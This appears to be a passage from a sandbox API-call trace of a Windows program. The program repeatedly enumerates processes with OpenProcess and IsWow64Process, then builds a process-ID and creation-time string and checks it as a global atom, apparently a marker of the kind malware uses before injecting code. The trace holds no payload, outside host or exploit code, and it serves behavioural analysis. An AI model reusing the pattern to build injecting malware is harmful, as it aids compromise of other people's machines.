	[0116.738] CloseHandle (hObject=0x698) returned 1
	[0116.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0116.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0116.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0116.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0116.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0116.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0116.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0116.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0116.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0116.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0116.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0116.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0116.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0116.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0116.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0116.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0116.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0116.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0116.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0116.779] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.779] CloseHandle (hObject=0x698) returned 1
	[0116.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0116.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0116.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0116.779] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.779] CloseHandle (hObject=0x698) returned 1
	[0116.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0116.779] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0116.779] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.780] CloseHandle (hObject=0x698) returned 1
	[0116.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0116.780] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.780] CloseHandle (hObject=0x698) returned 1
	[0116.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0116.780] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.780] CloseHandle (hObject=0x698) returned 1
	[0116.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0116.780] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.780] CloseHandle (hObject=0x698) returned 1
	[0116.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0116.780] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.780] CloseHandle (hObject=0x698) returned 1
	[0116.780] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0116.780] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.781] CloseHandle (hObject=0x698) returned 1
	[0116.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0116.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0116.781] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.781] CloseHandle (hObject=0x698) returned 1
	[0116.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0116.781] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.781] CloseHandle (hObject=0x698) returned 1
	[0116.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0116.781] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.781] CloseHandle (hObject=0x698) returned 1
	[0116.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0116.781] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.781] CloseHandle (hObject=0x698) returned 1
	[0116.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0116.782] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.782] CloseHandle (hObject=0x698) returned 1
	[0116.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0116.782] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.782] CloseHandle (hObject=0x698) returned 1
	[0116.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0116.782] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.782] CloseHandle (hObject=0x698) returned 1
	[0116.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0116.782] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.782] CloseHandle (hObject=0x698) returned 1
	[0116.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0116.782] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.783] CloseHandle (hObject=0x698) returned 1
	[0116.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0116.783] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.783] CloseHandle (hObject=0x698) returned 1
	[0116.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0116.783] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.783] CloseHandle (hObject=0x698) returned 1
	[0116.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0116.783] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.783] CloseHandle (hObject=0x698) returned 1
	[0116.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0116.783] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.783] CloseHandle (hObject=0x698) returned 1
	[0116.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0116.784] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.784] CloseHandle (hObject=0x698) returned 1
	[0116.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0116.784] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.784] CloseHandle (hObject=0x698) returned 1
	[0116.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0116.784] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.784] CloseHandle (hObject=0x698) returned 1
	[0116.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0116.784] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.784] CloseHandle (hObject=0x698) returned 1
	[0116.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0116.784] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.784] CloseHandle (hObject=0x698) returned 1
	[0116.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0116.785] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.785] CloseHandle (hObject=0x698) returned 1
	[0116.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0116.785] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.785] CloseHandle (hObject=0x698) returned 1
	[0116.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0116.785] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.785] CloseHandle (hObject=0x698) returned 1
	[0116.785] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0116.785] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.785] CloseHandle (hObject=0x698) returned 1
	[0116.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.786] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.786] CloseHandle (hObject=0x698) returned 1
	[0116.786] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.786] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.786] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0116.786] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0116.786] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0116.787] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.787] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0116.787] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.788] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0116.788] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0116.788] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0116.788] CloseHandle (hObject=0x698) returned 1
	[0116.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0116.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0116.788] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.788] CloseHandle (hObject=0x698) returned 1
	[0116.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0116.788] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.788] CloseHandle (hObject=0x698) returned 1
	[0116.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0116.788] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.788] CloseHandle (hObject=0x698) returned 1
	[0116.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0116.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0116.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0116.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0116.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0116.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0116.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0116.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0116.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0116.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0116.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0116.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0116.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0116.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0116.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0116.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0116.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0116.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0116.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0116.853] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.853] CloseHandle (hObject=0x698) returned 1
	[0116.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0116.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0116.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0116.854] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.854] CloseHandle (hObject=0x698) returned 1
	[0116.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0116.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0116.854] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.854] CloseHandle (hObject=0x698) returned 1
	[0116.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0116.855] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.855] CloseHandle (hObject=0x698) returned 1
	[0116.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0116.855] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.855] CloseHandle (hObject=0x698) returned 1
	[0116.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0116.855] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.855] CloseHandle (hObject=0x698) returned 1
	[0116.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0116.855] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.855] CloseHandle (hObject=0x698) returned 1
	[0116.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0116.855] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.855] CloseHandle (hObject=0x698) returned 1
	[0116.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0116.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0116.856] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.856] CloseHandle (hObject=0x698) returned 1
	[0116.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0116.856] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.856] CloseHandle (hObject=0x698) returned 1
	[0116.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0116.856] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.856] CloseHandle (hObject=0x698) returned 1
	[0116.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0116.856] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.856] CloseHandle (hObject=0x698) returned 1
	[0116.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0116.856] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.857] CloseHandle (hObject=0x698) returned 1
	[0116.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0116.857] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.857] CloseHandle (hObject=0x698) returned 1
	[0116.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0116.857] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.857] CloseHandle (hObject=0x698) returned 1
	[0116.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0116.857] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.857] CloseHandle (hObject=0x698) returned 1
	[0116.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0116.857] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.858] CloseHandle (hObject=0x698) returned 1
	[0116.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0116.858] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.858] CloseHandle (hObject=0x698) returned 1
	[0116.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0116.858] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.858] CloseHandle (hObject=0x698) returned 1
	[0116.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0116.858] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.858] CloseHandle (hObject=0x698) returned 1
	[0116.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0116.858] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.858] CloseHandle (hObject=0x698) returned 1
	[0116.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0116.859] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.859] CloseHandle (hObject=0x698) returned 1
	[0116.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0116.859] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.859] CloseHandle (hObject=0x698) returned 1
	[0116.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0116.859] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.859] CloseHandle (hObject=0x698) returned 1
	[0116.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0116.859] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.859] CloseHandle (hObject=0x698) returned 1
	[0116.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0116.859] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.859] CloseHandle (hObject=0x698) returned 1
	[0116.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0116.860] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.860] CloseHandle (hObject=0x698) returned 1
	[0116.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0116.860] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.860] CloseHandle (hObject=0x698) returned 1
	[0116.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0116.860] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.860] CloseHandle (hObject=0x698) returned 1
	[0116.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0116.860] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.860] CloseHandle (hObject=0x698) returned 1
	[0116.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.861] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.861] CloseHandle (hObject=0x698) returned 1
	[0116.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.861] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.861] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0116.861] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0116.862] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0116.862] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.862] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0116.862] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.862] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0116.863] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0116.863] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0116.863] CloseHandle (hObject=0x698) returned 1
	[0116.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0116.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0116.863] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.863] CloseHandle (hObject=0x698) returned 1
	[0116.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0116.863] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.863] CloseHandle (hObject=0x698) returned 1
	[0116.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0116.863] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.863] CloseHandle (hObject=0x698) returned 1
	[0116.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0116.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0116.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0116.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0116.902] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0116.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0116.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0116.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0116.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0116.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0116.903] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0116.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0116.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0116.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0116.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0116.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0116.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0116.904] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
